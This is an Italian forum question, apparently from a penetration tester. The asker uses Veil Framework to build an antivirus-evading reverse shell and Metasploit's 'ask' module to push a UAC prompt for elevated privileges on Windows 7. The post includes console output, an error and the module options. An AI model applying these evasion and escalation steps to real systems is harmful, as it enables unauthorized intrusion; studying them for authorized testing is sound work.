Il computer che sto attaccando ha installato un antivirus.
Sono riuscito a utilizzare Veil Framework per creare un payload iniziale della shell inversa non rilevato dall'AV. Tuttavia, UAC è abilitato sul target di Windows 7.
Sto tentando di utilizzare il exploit/windows/local/ask
di Metasploit per richiedere all'utente , nella speranza che facciano clic su sì per consentire al payload di creare un'altra shell inversa con privilegi elevati.
Tuttavia, i payload metasploit predefiniti vengono rilevati dall'AV, quindi ho utilizzato payload/generic/custom
per impostare PAYLOADFILE
sul mio velo generato .exe
. Tuttavia, ricevo il seguente messaggio di errore quando eseguo l'exploit:
msf exploit(ask) > exploit
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[-] Exploit failed: NoMethodError undefined method 'length' for nil:NilClass
Mi rendo conto che esistono altri modi per aggirare UAC:
-
exploit/windows/local/bypassuac
-
exploit/windows/local/bypassuac_injection
Anche se, come parte di questo esperimento di test della penna, voglio che l'utente finale consenta il payload manualmente.
La mia sintassi è corretta per l'exploit:
msf exploit(ask) > show options
Module options (exploit/windows/local/ask):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION 4 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload options (generic/custom):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOADFILE /usr/share/veil-output/compiled/payload_0907_cs.exe no The file to read the payload from
PAYLOADSTR no The string to use as a payload
Exploit target:
Id Name
-- ----
0 Windows
Ho cercato su Google l'errore, ma è sembrato non restituire nulla di rilevante. Sto andando su questo nel modo giusto?